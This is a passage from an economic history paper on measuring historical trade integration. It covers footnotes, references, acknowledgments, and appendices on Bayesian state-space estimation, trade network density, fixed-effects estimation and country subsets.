RICardo data. It was converted from pounds to US dollars using the historical exchange rate from Williamson (2015).\n\n6. de la Escosura (2000) starts with current, exchange rate converted, GDPs and uses the shortcut method to compute the current, PPP converted, GDPs. Klasing and Milionis (2014) on the other hand start with Maddison’s GDPs in constant, PPP converted, 1990 US dollars and transform it using a GDP deflator in current US dollars. They subsequently transform this series into current, exchange rate converted, US dollars using a similar (but inverted) shortcut method.\n\n7. No of countries $$\\times$$ (no of countries $$-1$$) $$\\times$$ No of years (excl. World Wars) = $$225\\times 224 \\times (2011-1870+1-5-6).$$\n\n8. The Overseas Countries and Territories account for the remaining colonies after the year 2000.\n\n9. 
Initial tests found that the time dependency is the same for the vast majority of country couples: 94.4 % of the time $$T_{ij}$$ is not significantly different at the 1 % level from $$T_{jl}$$ with $$ij \\ne jl$$.\n\n10. The size of the dataset required the use of the resources of the Flemish Supercomputer Center, which was kindly provided by Ghent University, the Flemish Supercomputer Center (VSC), the Hercules Foundation and the Flemish Government—department EWI.\n\n11. $$hti^\\star _{ij,t} = (hti_{ij,t} - \\mu ) / \\sigma .$$\n\nWith $$\\mu = \\frac{\\sum _{i=1}^{n}\\sum _{j=1, j\\ne i}^n \\sum _{t=1}^T( hti_{ij,t} )}{n(n-1)T}$$ and $$\\sigma ^2 = \\frac{\\sum _{i=1}^{n}\\sum _{j=1, j\\ne i}^n \\sum _{t=1}^T (hti_{ij,t} - \\mu )^2}{n(n-1)T-1}.$$\n\n12. These and other yearly graphs are made available together with the indicator at http://www.sherppa.ugent.be/hti/hti.html.\n\n14. Multilateral resistance terms are country-specific barriers to trade that in this case are allowed to vary over time.\n\n15. Since the index is already normalized for the size of the sender country, the GDP of the sender country should actually be left out of the gravity model regressions. However, its inclusion did not significantly affect the results.\n\n16. The number of dyads covered increase more than sixfold between 1870 and 1880.\n\n## References\n\n• Alcalá F, Ciccone A (2004) Trade and productivity. Q J Econ 119(2):613–646\n\n• Arribas I, Pérez F, Tortosa-Ausina E (2011) A new interpretation of the distance puzzle based on geographic neutrality. Econ Geogr 87(3):335–362\n\n• Baldwin R, Taglioni D (2006) Gravity for dummies and dummies for gravity equations. Technical Report w12516, National Bureau for Economic Research\n\n• Barbieri K, Keshk O (2012) Correlates of war project trade data set codebook, verion 3.0. http://correlatesofwar.org\n\n• Barbieri K, Keshk O, Pollins B (2009) Trading data: evaluating our assumptions and coding rules. Confl Manag Peace Sci 26(4):471–491\n\n• Berthelon M, Freund C (2008) On the conservation of distance in international trade. J Int Econ 75(2):310–320\n\n• Bleaney M, Neaves AS (2013) Declining distance effects in international trade: some country-level evidence. World Econ 36(8):1029–1040\n\n• Bolt J, van Zanden J (2013) The first update of the maddison project; re-estimating growth before 1820. Maddison Project Working Paper 4. http://www.ggdc.net/maddison/maddison-project/data.htm\n\n• Bosquet C, Boulhol H (2013) What is really puzzling about the “distance puzzle”. Rev World Econ 151(1):1–21\n\n• Boulhol H, De Serres A (2010) Have developed countries escaped the curse of distance? J Econ Geogr 10(1):113–139\n\n• Brun JF, Carrère C, Guillaumont P, De Melo J (2005) Has distance died? evidence from a panel gravity model. World Bank Econ Rev 19(1):99–120\n\n• Buch CM, Kleinert J, Toubal F (2004) The distance puzzle: on the interpretation of the distance coefficient in gravity equations. Econ Lett 83(3):293–298\n\n• Carter CK, Kohn R (1994) On gibbs sampling for state space models. Biometrika 81(3):541–553\n\n• Coe DT, Subramanian A, Tamirisa NT (2007) The missing globalization puzzle: evidence of the declining importance of distance. IMF staff papers, pp 34–58\n\n• Crafts N (2004) Globalisation and economic growth: a historical perspective. World Econ 27(1):45–58\n\n• Dilip K (2003) The economic dimensions of globalization. Palgrave Macmillan, Hampshire\n\n• Disdier AC, Head K (2008) The puzzling persistence of the distance effect on bilateral trade. 
Rev Econ Stat 90(1):37–48\n\n• Durbin J, Koopman S (2012) Time series analysis by state space methods, 2nd edn. Oxford University Press, Oxford\n\n• de la Escosura LP (2000) International comparisons of real product, 1820–1990: an alternative data set. Explor Econ Hist 37:1–41\n\n• Estevadeordal A, Frantz B, Taylor AM (2002) The rise and fall of world trade, 1870–1939. Technical Report w9318, National Bureau of Economic Research\n\n• Fagiolo G, Reyes J, Schiavo S (2008) On the topological properties of the world trade web: a weighted network analysis. Phys A Stat Mech Appl 387(15):3868–3873\n\n• Feenstra RC, Inklaar R, Timmer MP (2013) The next generation of the penn world table. www.ggdc.net/pwt\n\n• Findlay R, O’Rourke KH (2007) Power and plenty: trade, war, and the world economy in the second millennium, vol 51. Princeton University Press, Princeton\n\n• Frances C (1997) The death of distance. Harvard Business School Press, Boston\n\n• Guimarães P, Portugal P (2009) A simple feasable alternative procedure to estimate models with high-dimensional fixed effects. IZA Discussion paper 3935\n\n• Head K, Mayer T (2013) Gravity equations: workhorse, toolkit, and cookbook. Center for Economic Policy Research 9322\n\n• Head K, Ries J (2001) The erosion of colonial trade linkages after independence. Am Econ Rev 91(4):858–876\n\n• Irwin DA, O’Rourke KH (2011) Coping with shocks and shifts: The multilateral trading system in historical perspective. Technical Report w17598, National Bureau of Economic Research\n\n• Jacks DS (2009) On the death of distance and borders: evidence from the nineteenth century. Econ Lett 105(3):230–233\n\n• Jacks DS, Meissner CM, Novy D (2010) Trade costs in the first wave of globalization. Explor Econ Hist 47(2):127–141\n\n• Jacks DS, Meissner CM, Novy D (2011) Trade booms, trade busts, and trade costs. J Int Econ 83(2):185–201\n\n• Kim CJ, Nelson CR (1999) State-space models with regime switching: classical and Gibbs-sampling approaches with applications. MIT Press, Cambridge\n\n• Klasing MJ, Milionis P (2014) Quantifying the evolution of world trade, 1870–1949. J Int Econ 92(1):185–197\n\n• Lampe M, Sharp P (2013) Tariffs and income: a time series analysis for 24 countries. Cliometrica 7(3):207–235\n\n• Lampe M, Sharp P (2015) Cliometric approaches to international trade. In: Diebolt C, Haupert M (eds) Handbook of cliometrics. Springer, Berlin\n\n• Larch M, Norbäck PJ, Sirries S, Urban D (2013) Heterogeneous firms, globalization and the distance puzzle. Technical Report, IFN Working Paper\n\n• Leamer EE, Levinsohn J (1995) International trade theory: the evidence. Handb Int Econ 3:1339–1394\n\n• Lin F, Sim N (2012) Death of distance and the distance puzzle. Econ Lett 116(2):225–228\n\n• Mongelli FP, Dorrucci E, Agur I (2005) What does european institutional integration tell us about trade integration. European Central Bank Occasional Paper Series 40\n\n• Morgenstern O (1962) On the accuracy of economic observations. Princeton University Press, Princeton\n\n• Newman M (2010) Networks: an introduction. Oxford University Press, Oxford\n\n• O’Rourke K (2009) Politics and trade: lessons from past globalisations. Technical Report, Bruegel\n\n• O’Rourke KH, Williamson JG (2004) Once more: When did globalisation begin? Eur Rev Econ Hist 8(1):109–117\n\n• Rayp G, Standaert S (2015) Measuring actual integration: An outline of a bayesian state-space approach. In: Lombaerde PD, Saucedo E (eds) Indicator-based monitoring of regional economic integration, UNU series on regionalism. 
Springer, Dordrecht\n\n• Sarkees MR, Wayman F (2010) Resort to war: 1816–2007. CQ Press, Washington, DC\n\n• Schiff M, Carrere C (2003) On the geography of trade: distance is alive and well. Available at SSRN 441467\n\n• Siliverstovs B, Schumacher D (2009) Disaggregated trade flows and the missing “globalization puzzle”. Econ Int 115(3):141–164\n\n• Silva JS, Tenreyro S (2006) The log of gravity. Rev Econ Stat 88(4):641–658\n\n• Singer JD, Bremer S, Stuckey J (1972) Capability distribution, uncertainty, and major power war, 1820–1965. In: Russet B (ed) Peace, war, and numbers. Sage, Beverly Hills, pp 19–48\n\n• Standaert S (2014) Divining the level of corruption: a bayesian state-space approach. J Comp Econ. doi:10.1016/j.jce.2014.05.007\n\n• Williamson SH (2015) What was the U.S. GDP then? Technical Report, Measuring Worth\n\n## Acknowledgments\n\nWe would like to thank Guillaume Daudin, Luca De Benedictis, Kevin O’Rourke and Eric Vanhaute for their feedback and suggestions, as well as the Flemish Supercomputer Center for allowing us access to its infrastructure. Funding for this research was provided by the Research Foundation - Flanders and the Belgian National Bank.\n\n## Author information\n\nAuthors\n\n### Corresponding author\n\nCorrespondence to Samuel Standaert.\n\n## Appendices\n\nSee Table 2.\n\n### Appendix 2: Estimating the state-space model\n\nTo estimate the state-space model, we need to solve for the structural parameters of the state-space model ($$C$$, $$Z$$, $$T_t$$, $$H$$ and $$Q$$) as well as the level of trade integration ($$hti$$). While it is possible to maximize the combined distribution numerically for small datasets, using a Gibbs sampler simplifies the estimation procedure considerably by splitting up the process into conditional probabilities.\n\nFor example, say we have to draw from the joint probability of two variables $$p(A,B)$$, when only the conditional probability of $$p(A|B)$$ and $$p(B|A)$$ are known. Starting from a (random) value $$b_0$$, the Gibbs sampler will draw a first value of A conditional on $$B^{(0)}$$: $$A^{(1)} \\sim p(A|B^{(0)})$$. Conditional on this last draw, a value of B is drawn ($$B^{(1)} \\sim p(B|A^{(1)})$$) which is in turn used to draw a new value for A ($$A^{(2)} \\sim p(A|B^{(1)})$$. This process is repeated thousands of times, until the draws from the conditional distributions have converged to those of the combined distribution $$p(A,B)$$. After discarding the unconverged draws (the burn-in), the remaining draws of A and B can be used to reconstitute their respective (unconditional) distributions.\n\nBecause we are using a Bayesian analysis framework, we have to be explicit about the prior distribution of the parameters. In other words, we have to state what we know about their distribution before looking at the data. Because there is no prior information, we imposed flat priors on $$Z$$, $$C$$ and $$log(H)$$, meaning that all values in the real space (or real positive space for the variance H) are equally probable.\n\nIn the case of the state-space model, the Gibbs sampler consists of two main blocks (Kim and Nelson 1999):\n\n1. 1.\n\nIf the level of trade integration ($$hti$$) was known, the parameters of the measurement and state equations (Eqs. 1 and 2) could be obtained using simple linear regressions. To ensure the model is identified, the variance of the error term of the state equation ($$Q$$) is typically set to 1. 
Taking, for example, the situation, where there is only one dyad to simplify notation: $$hti = (hti_{1},\\ldots , hti_{n})'$$\n\n$$p(T|hti)\\propto .5 * 1\\!\\!1_{|T|\\le 1} * N(b_T, v_T)$$\n(8)\n$$p(Z^k,C^k|hti,y,H)\\propto N(b^k_{Z,C}, v^k_{Z,C})$$\n(9)\n$$p(H_{(k,k)}|hti,y)\\propto iWish[e^{k\\prime } e^k ; \\; n ]$$\n(10)\n\nwith $$v_T = (T_{t-1}'T_{t-1})^{-1}$$; $$b_T = v_T * T_{t-1}'T_t$$; $$v^k_{Z,C} = (hti'hti)^{-1}*H_{(k,k)}$$; $$b^k_{Z,C} = (hti'hti)^{-1} * hti'y^k$$; $$e^k = y^k - C^k - Z^k * hti$$; and $$iWish$$ the inverse Wishart distribution.\n\n2. 2.\n\nConditional on the parameters of the state and measurement equations, the distribution of $$hti$$ can be computed and drawn using the Carter and Kohn (1994) simulation smoother.\n\n• The Kalman filter: computes the distribution of $$hti$$ conditional on the information in all previous years. Starting from a wild guess, $$p(hti_0) = N(0,\\infty )$$, the following equations are iteratively solved for $$t = 1$$ to $$t = n$$:\n\n\\begin{aligned} a_{t|t}&= E(hti_t | y_1, \\ldots , y_t) \\nonumber \\\\&= T*a_{t-1|t-1} + \\kappa (y_t - C - Z T a_{t-1|t-1}) \\end{aligned}\n(11)\n\\begin{aligned} p_{t|t}&= V(hti_t | y_1, \\ldots , y_t) \\nonumber \\\\&= p_{t|t-1} + \\kappa Z p_{t-1|t-1} \\end{aligned}\n(12)\n\nwith $$\\kappa = p_{t|t-1} Z'(Z p_{t|t-1} Z' + H)^{-1}$$; and $$p_{t|t-1} = Tp_{t-1|t-1}T'+Q$$.\n\n• Simulation smoother: Draws from the distribution of $$hti$$ conditional on all information in the data and the previous draws. Starting from the last iteration of the Kalman filter, draw $$\\hat{hti}_n$$ from $$N(a_{n|n}; \\;p_{n|n})$$ and iterate backwards from $$t=n-1$$ to $$t=1$$:\n\n\\begin{aligned} a_{t|n}&= E(hti_t | y_1, \\ldots y_n) \\nonumber \\\\&= a_{t|t} + \\varsigma (\\hat{hti}_{t+1} - Ta_{t|t}) \\end{aligned}\n(13)\n\\begin{aligned} p_{t|n}&=V(hti_t | y_1, \\ldots y_n) \\nonumber \\\\&=p_{t|t} + \\varsigma (p_{t+1|n} - Tp_{t|t}T'-Q)\\varsigma ' \\end{aligned}\n(14)\n\nwith $$\\varsigma = p_{t|t}T'p_{t+1|t}^{-1}$$; and $$\\hat{hti}_{t+1}$$ a random draw from $$N(a_{t+1|n}; \\; p_{t+1|n})$$.\n\n### Appendix 3: The historical trade network\n\nIn order to combine the historical trade integration indices into a network, the index values corresponding to countries that are integrated need to be separated from those corresponding to countries that are not. A natural way of making this distinction is to contrast countries that trade with each other ($$X_{ij,t} > 0$$) to those that do not ($$X_{ij,t} = 0$$). The problem is that this approach is skewed by a large number of very small nonzero trade flows.\n\nRather than choosing an arbitrary cut-off value, the hti allows us to use significant differences to determine which countries are linked. To start, we used the estimates of the structural parameters of the state-space model to generate index values for a fictional dyad where trade was zero for the entire period. Labeling these observations as $$hti_{0,t}$$, we defined significant levels of trade in the following way: An edge $$e$$ from country $$i$$ to country $$j$$ exists if, and only if, its level of trade in year $$t$$ is significantly higher than that of $$hti_{0,t}$$: $$e_{ij,t} = 1 \\iff \\, hti_{0,t} < hti_{ij,t}$$ in at least 99 % of all iterations of the (converged) Gibbs sampler. Using the $$hti_{0,t}$$ definition, 115,911 edges were identified (6.3 % of observations).\n\nPanel a of Fig. 
7 shows the overall network density (the fraction of dyads that are connected) gradually decreasing throughout the first globalization wave. In contrast, the trade network becomes increasingly connected during the second globalization wave. As can be seen in panel b, the number of trade links (edges) more or less continuously grows over the entire time-period and is initially offset by the rapid rise in the number of countries. This is especially noticeable when the Soviet Block breaks up in the 1990s, causing a rapid downward shift in the network density.\n\nSimilar to the distance regressions, the density was also computed when the number of countries was kept constant using the 1880 and 1950 subsets. This reveals that the decrease in density during the first globalization wave was driven by the addition of new countries. When this is kept constant, the network density almost doubles during the first wave. In addition, it reinforces the effects of the 1930 and 2008 economic crises, both causing a substantial drop in the density. To ensure that these results were not driven by the inclusion of the colonial trade data, the density was also computed using only the official countries according to the COW state system dataset. However, this did not significantly alter the conclusion (available upon request). In other words, once the density is corrected for the increasing number of countries, it conforms to the globalization pattern found in the literature.\n\n### Appendix 4: Estimating models with high-dimensional fixed effects\n\nFollowing Guimarães and Portugal (2009), the number of fixed effects can be reduced by half by first demeaning both dependent and explanatory variables in the sender-year dimension, leaving only the sender-target dummies. Using conditional probabilities, the fixed effects ($$c_i$$) can be separated from the explanatory variables ($$X_{i,t}$$), which significantly reduces the size of the matrix that needs to be inverted.\n\n$$y_{i,t} = c_i + X_{i,t} \\beta + \\epsilon _{i,t} \\quad \\hbox {with } \\epsilon _{i,t} \\sim N(0,\\sigma ^2)$$\n(15)\n\nEquation 15 can be estimated using a three-step Gibbs sampling procedure. For example, when using flat (uninformative) priors, the conditional probabilities are:\n\n1. 1.\n\n$$\\beta | c_i, \\sigma ^2 \\sim N(e_\\beta ,v_\\beta )$$\n\n$$e_\\beta = (X'X)^{-1}(X'(y-c))$$ with $$\\{X\\}_{i,t} = X_{i,t}$$ and $$\\{y-c\\}_{i,t} = y_{i,t}-c_i$$\n\n$$v_\\beta = \\sigma ^2 (X'X)^{-1}$$\n\n2. 2.\n\n$$c_i | beta, \\sigma ^2 \\sim N(\\bar{c_i},\\sigma ^2/n)$$\n\n$$\\bar{c_i} = \\sum ^n_t(y_{i,t} - X_{i,t}\\beta )/n$$ with $$n$$ the number of observations of country $$i$$\n\n3. 3.\n\n$$\\sigma ^2 | beta, c_i \\sim \\hbox {iWishart}(e'e,N)$$\n\n$$e = y_{i,t} - c_i - X_{i,t}\\beta$$\n\n### Appendix 5: Country subsets\n\nGroup 1: included in 1880< and 1950<\nAlgeria Egypt Italy Romania\nAscension Falkland Isl. Japan Senegal\nAustralia Fiji Liberia Sierra Leone\nAustria Finland Luxembourg Singapore\nBelize Germany Maldives Sri Lanka\nBermuda Ghana Malta St. Pierre and Miquelon\nBolivia Gibraltar Mauritius Suriname\nBrazil Greece Mexico Sweden\nChile Guyana Netherlands Trinidad and Tobago\nChina Haiti New Zealand Tunisia\nColombia Honduras Nicaragua Turkey\nCosta Rica Hong Kong Norway UK\nCuba Iceland Paraguay USA\nDenmark India Peru Uruguay\nDominican Rep. 
Indonesia Philippines Venezuela\nDutch Antilles Iran Portugal Yugoslavia\nGroup 2: included in 1950<\nAfghanistan Djibouti Lebanon Saint Lucia\nAlbania Dominica Lesotho Saint Vincent\nAmerican Samoa Equatorial Guinea Libya Samoa\nAngola Eritrea Lithuania Sao Tome and Principe\nAntigua and Barbuda Estonia Malawi Saudi Arabia\nBahamas Ethiopia Malaysia Seychelles\nBahrain Faroe Islands Mali Solomon Islands\nBenin Gabon Mongolia South Korea\nBosnia Gambia N. Mariana Isl. St. Kitts and Nevis\nBotswana Greenland Namibia Sudan\nBurkina Faso Guam Nepal Syria\nBurma Guinea New Caledonia Tanzania\nBurundi Guinea-Bissau Niger Togo\nCambodia Hungary Nigeria Tonga\nCameroon Iraq North Korea Tuvalu\nCape Verde Ireland Oman UAE\nCentral African Rep. Israel Pakistan Uganda" ]
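The forward-filter, backward-sample step at the heart of Appendix 2 (Eqs. 11–14) can be made concrete with a short numerical sketch. The following Python/NumPy fragment is a minimal illustration only, not the authors' code: it assumes a single dyad with a scalar latent hti state, K fully observed indicators per year, the usual textbook form of the Kalman update, and an arbitrary near-diffuse prior for the initial state; the function name `ffbs` and the toy inputs are likewise invented for the example. The paper's estimator additionally handles missing indicators and embeds this draw inside the full Gibbs sampler that also updates C, Z, H and the dyad-specific T.

```python
import numpy as np

rng = np.random.default_rng(0)

def ffbs(y, C, Z, T, H, Q=1.0):
    """One forward-filter, backward-sample draw of a scalar latent state.

    y : (n, K) indicators for one dyad (no missing values in this sketch)
    C : (K,) intercepts, Z : (K,) loadings, H : (K, K) measurement covariance
    T : scalar AR(1) coefficient of the state, Q : state innovation variance.
    """
    n, K = y.shape
    a = np.zeros(n)            # filtered means  a_{t|t}
    p = np.zeros(n)            # filtered variances p_{t|t}
    a_prev, p_prev = 0.0, 1e6  # near-diffuse prior for the initial state (assumption)

    # Kalman filter, Eqs. 11-12 in their usual textbook form
    for t in range(n):
        a_pred = T * a_prev                    # a_{t|t-1}
        p_pred = T * p_prev * T + Q            # p_{t|t-1}
        F = p_pred * np.outer(Z, Z) + H        # innovation covariance Z p Z' + H
        kappa = p_pred * Z @ np.linalg.inv(F)  # Kalman gain
        v = y[t] - C - Z * a_pred              # innovation
        a[t] = a_pred + kappa @ v
        p[t] = p_pred - (kappa @ Z) * p_pred
        a_prev, p_prev = a[t], p[t]

    # Carter-Kohn backward sampling, Eqs. 13-14
    draw = np.empty(n)
    draw[-1] = rng.normal(a[-1], np.sqrt(p[-1]))
    for t in range(n - 2, -1, -1):
        p_pred = T * p[t] * T + Q              # p_{t+1|t}
        gain = p[t] * T / p_pred               # varsigma in the paper's notation
        mean = a[t] + gain * (draw[t + 1] - T * a[t])
        var = p[t] - gain * T * p[t]
        draw[t] = rng.normal(mean, np.sqrt(var))
    return draw

# Toy usage with invented data: two indicators observed over 30 years.
y_toy = rng.normal(size=(30, 2))
hti_draw = ffbs(y_toy, C=np.zeros(2), Z=np.ones(2), T=0.9, H=np.eye(2))
```

Repeating this draw across Gibbs iterations and discarding the burn-in yields the posterior distribution of the index, from which the point estimates and the highest posterior density bands are taken.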
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79190254,"math_prob":0.9839631,"size":10405,"snap":"2022-27-2022-33","text_gpt3_token_len":3282,"char_repetition_ratio":0.0987405,"word_repetition_ratio":0.014059754,"special_character_ratio":0.3146564,"punctuation_ratio":0.10332103,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99080557,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-26T12:45:52Z\",\"WARC-Record-ID\":\"<urn:uuid:7bf3406d-9d5e-46f5-90dd-0c799c4c5a4e>\",\"Content-Length\":\"222089\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b6a1649e-4891-462d-b8ff-1d2ca46cf97b>\",\"WARC-Concurrent-To\":\"<urn:uuid:eff04e9c-adbd-4ca6-afba-d14be6bff7c9>\",\"WARC-IP-Address\":\"146.75.32.95\",\"WARC-Target-URI\":\"https://link.springer.com/article/10.1007/s11698-015-0130-5?error=cookies_not_supported&code=d6e60a5e-59ae-4e54-b8a7-ee83fd0fbf08\",\"WARC-Payload-Digest\":\"sha1:CSDUMBIXM7DEQBUSI3KXWSWA5BOTPNVB\",\"WARC-Block-Digest\":\"sha1:4BDWDX65H7Q6EMGVYKFDGGBRE36HE27V\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103205617.12_warc_CC-MAIN-20220626101442-20220626131442-00156.warc.gz\"}"}
https://docs.ros.org/en/noetic/api/ecl_geometry/html/classecl_1_1Polynomial_3_010_01_4.html
[ "ecl::Polynomial< 0 > Class Reference\n\nSpecialisation for the zero-th order polynomial. More...\n\n`#include <polynomial.hpp>`\n\n## Public Types\n\ntypedef Array< double, 1 > Coefficients\nThe coefficient container storage type. More...\n\n## Public Member Functions\n\nCoefficientscoefficients ()\nHandle to the coefficient array, use to initialise the polynomial. More...\n\nconst Coefficientscoefficients () const\nNon-modifiable handle to the coefficient array. More...\n\ndouble dderivative (const double &) const\nAccess the second derivative directly (always returns 0).. More...\n\nPolynomial< 0 > derivative () const\nDerivative of a zero'th order polynomial is always zero. More...\n\ndouble derivative (const double &) const\nAccess the derivative directly (always returns 0). More...\n\ndouble operator() (const double &) const\nAccess the value of the polynomial at the specified point. More...\n\nPolynomial ()\nDefault constructor. More...\n\nvoid shift_horizontal (const double &)\nHorizontal shift transform. More...\n\nvirtual ~Polynomial ()\n\n## Private Attributes\n\nCoefficients coeff\n\n## Detailed Description\n\nSpecialisation for the zero-th order polynomial.\n\nRepresents a zero'th order polynomial (scalar). It is necessary to handle this separately as the derivatives do not return lower degree polynomials.\n\nPolynomial, Math::Polynomials.\n\nDefinition at line 285 of file polynomial.hpp.\n\n## ◆ Coefficients\n\n typedef Array ecl::Polynomial< 0 >::Coefficients\n\nThe coefficient container storage type.\n\nDefinition at line 290 of file polynomial.hpp.\n\n## ◆ Polynomial()\n\n ecl::Polynomial< 0 >::Polynomial ( )\ninline\n\nDefault constructor.\n\nThis initialises the scalar coefficient for the zero'th polynomial to zero.\n\nDefinition at line 301 of file polynomial.hpp.\n\n## ◆ ~Polynomial()\n\n virtual ecl::Polynomial< 0 >::~Polynomial ( )\ninlinevirtual\n\nDefinition at line 302 of file polynomial.hpp.\n\n## ◆ coefficients() [1/2]\n\n Coefficients& ecl::Polynomial< 0 >::coefficients ( )\ninline\n\nHandle to the coefficient array, use to initialise the polynomial.\n\nThis returns a handle to the coefficient array. 
Use this with the comma initialiser to conveniently set the polynomial.\n\nPolynomial<0> p;\np.coefficients() = 1;\ncout << p << endl; // 1.00\nReturns\nCoefficients& : reference to the co-efficient array.\n\nDefinition at line 366 of file polynomial.hpp.\n\n## ◆ coefficients() [2/2]\n\n const Coefficients& ecl::Polynomial< 0 >::coefficients ( ) const\ninline\n\nNon-modifiable handle to the coefficient array.\n\nReturns\nconst Coefficients& : non-modifiable reference to the co-efficient array.\n\nDefinition at line 372 of file polynomial.hpp.\n\n## ◆ dderivative()\n\n double ecl::Polynomial< 0 >::dderivative ( const double & ) const\ninline\n\nAccess the second derivative directly (always returns 0)..\n\nAccess the values of the second derivative directly (always returns 0)..\n\nReturns\ndouble : 2nd derivative of a scalar is always 0.0.\n\nDefinition at line 345 of file polynomial.hpp.\n\n## ◆ derivative() [1/2]\n\n Polynomial<0> ecl::Polynomial< 0 >::derivative ( ) const\ninline\n\nDerivative of a zero'th order polynomial is always zero.\n\nDerivative of a zero'th order polynomial is always zero.\n\nReturns\nPolynomial<0> : the zero polynomial.\n\nDefinition at line 325 of file polynomial.hpp.\n\n## ◆ derivative() [2/2]\n\n double ecl::Polynomial< 0 >::derivative ( const double & ) const\ninline\n\nAccess the derivative directly (always returns 0).\n\nAccess the values of the derivative directly (always returns 0)..\n\nReturns\ndouble : derivative of a scalar is always 0.0.\n\nDefinition at line 335 of file polynomial.hpp.\n\n## ◆ operator()()\n\n double ecl::Polynomial< 0 >::operator() ( const double & ) const\ninline\n\nAccess the value of the polynomial at the specified point.\n\nAccess the value of the polynomial at the specified point.\n\nReturns\ndouble : the value of a scalar is always a_0.\n\nDefinition at line 381 of file polynomial.hpp.\n\n## ◆ shift_horizontal()\n\n void ecl::Polynomial< 0 >::shift_horizontal ( const double & )\ninline\n\nHorizontal shift transform.\n\nNormally, shifts the polynomial along the x axis by the specified offset, but in the case of this specialisation, does not change the polynomial.\n\nDefinition at line 313 of file polynomial.hpp.\n\n## ◆ coeff\n\n Coefficients ecl::Polynomial< 0 >::coeff\nprivate\n\nDefinition at line 383 of file polynomial.hpp.\n\nThe documentation for this class was generated from the following file:\n\necl_geometry\nAuthor(s): Daniel Stonier\nautogenerated on Sun Aug 2 2020 03:12:16" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6579671,"math_prob":0.5607292,"size":2996,"snap":"2021-31-2021-39","text_gpt3_token_len":637,"char_repetition_ratio":0.19919786,"word_repetition_ratio":0.2476415,"special_character_ratio":0.22897196,"punctuation_ratio":0.1904762,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9948363,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-25T17:36:32Z\",\"WARC-Record-ID\":\"<urn:uuid:6dde5bb0-c95b-46fb-aa25-a58bd903bd95>\",\"Content-Length\":\"24672\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0fb88dfa-8c97-476a-8f06-dbd1a88e1bf3>\",\"WARC-Concurrent-To\":\"<urn:uuid:a75ce35a-81a7-484b-abcc-7a8d7a14dd90>\",\"WARC-IP-Address\":\"140.211.9.98\",\"WARC-Target-URI\":\"https://docs.ros.org/en/noetic/api/ecl_geometry/html/classecl_1_1Polynomial_3_010_01_4.html\",\"WARC-Payload-Digest\":\"sha1:4JGCXRC37S7VFGIDODS7WGJQTXVS24U2\",\"WARC-Block-Digest\":\"sha1:OHQN3N3RATVT7JAVWOW2HEPW45CLB4BV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057733.53_warc_CC-MAIN-20210925172649-20210925202649-00488.warc.gz\"}"}
https://git.sr.ht/~kiito/bare-js/commit/1746c5aa62555c0f8b3b9644f60b021a08d303e3
[ "## ~kiito/bare-js\n\n1746c5aa62555c0f8b3b9644f60b021a08d303e3 — Emma 11 months ago\n```Enums implemented, un-broke Structs\n```\n```3 files changed, 106 insertions(+), 17 deletions(-)\n\nM README.md\nM example.js\nM lib-bare.js\n```\n`M README.md => README.md +9 -7`\n```@@ 4,25 4,27 @@ This is a work-in-progress JavaScript/Node.js implementation of [BARE](https://b\n\nThe idea so far is, that the parser and converter will run with node.js, while the resulting JavaScript classes should be usable in any JavaScript environment.\n\n-Have a look at `examples.js` on how to create type definitions in code for now.\n+Have a look at `examples.js` on how to create type definitions in code for now.\n+\nOr peek inside the `lib-bare.js`, where all conversion classes are located.\n-These are to be used directly when defining your own type.\n+These are to be used directly when defining your own type.\nWhenever a type takes some sort of arguments, they are static variables right at the top,\njust make sure to set them correctly since there are, as of now, no integrity checks on them.\n\n###What is still missing\n* The schema to js translator.\n- * Union and Enum types.\n- These are difficult to translate to js, so I'm going to have to think about use cases and how to make them convenient to use\n+ * Union type, this one is difficult to translate to js, so I'm going to have to think about use cases and how to make them convenient to use\n* Conversion error handling and integrity verification.\n* Unit tests, these will come last.\n\n###A note about Number and 64 bits\nJavascript is a wonderful language, and as such it doesn't use an integer type for numbers.\nInstead, every single number is stored as a double precision float.\n-This limits the usable range of integers to 53 bits, which means the maximum unsigned value is just over 9 quadrillion `(10^15)`.\n+This limits the usable range of integers to 53 bits, which means the maximum unsigned value is just over 9 quadrillion `(10^15)`.\n+\nThere is the [BitInt](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt) type that allows arbitrary large integers.\n-But it has limitations; you can't use them in Math functions or beside regular Numbers.\n-Keep this in mind when using the variable length, and the 64 bit integer types, since these return a BigInt by default.\n+But it has limitations; you can't use them in Math functions or beside regular Numbers.\n+Keep this in mind when using the variable length, and the 64 bit integer types, since these return a BigInt by default.\n+\nThe lib provides `safeNumber` which will convert a BigInt to Number if it fits into 53 bits, or throw an Error if it does not fit if you just need a little more headroom.\n\n```\n`M example.js => example.js +42 -3`\n```@@ 42,6 42,38 @@ let test2 = {\n'uint': 365555,\n};\n\n+class ChannelEnum extends BARE.Enum {\n+\tstatic keys = BARE.mapEnum(this, {\n+\t\t0: 'RED',\n+\t\t1: 'BLUE',\n+\t\t2: 'GREEN',\n+\t\t10: 'ALL',\n+\t});\n+}\n+\n+class Pair extends BARE.Struct {\n+\tstatic entries = [\n+\t\t['channel', ChannelEnum],\n+\t\t['value', BARE.F64],\n+\t];\n+}\n+\n+class Test3 extends BARE.ArrayFixed {\n+\tstatic length = 2;\n+\tstatic type = Pair;\n+}\n+\n+let test3 = [\n+\t{\n+\t\tchannel: ChannelEnum.RED,\n+\t\tvalue: 2 * Math.PI,\n+\t},\n+\t{\n+\t\tchannel: ChannelEnum.ALL,\n+\t\tvalue: 6.9,\n+\t},\n+];\n+\nclass Address extends BARE.Struct {\nstatic entries = [\n['address', class extends BARE.ArrayFixed {\n\n@@ 72,17 104,24 @@ let 